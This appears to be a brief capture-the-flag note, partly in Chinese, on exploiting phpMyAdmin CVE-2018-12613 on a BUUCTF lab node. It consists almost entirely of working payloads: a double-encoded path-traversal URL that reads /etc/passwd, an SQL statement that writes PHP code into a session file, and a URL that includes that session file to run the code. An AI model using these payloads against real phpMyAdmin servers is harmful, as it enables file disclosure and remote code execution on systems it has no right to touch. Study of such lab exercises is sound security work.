buuctf*[PHPMYADMIN]CVE-2018-12613 1

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 

在sql里面执行 SELECT '<?=phpinfo()?>';

 

 http://node4.buuoj.cn:26180/index.php?target=sql.php?/../../../../../../../../../tmp/sess_be13990e05aa8958689867e1d1b31c67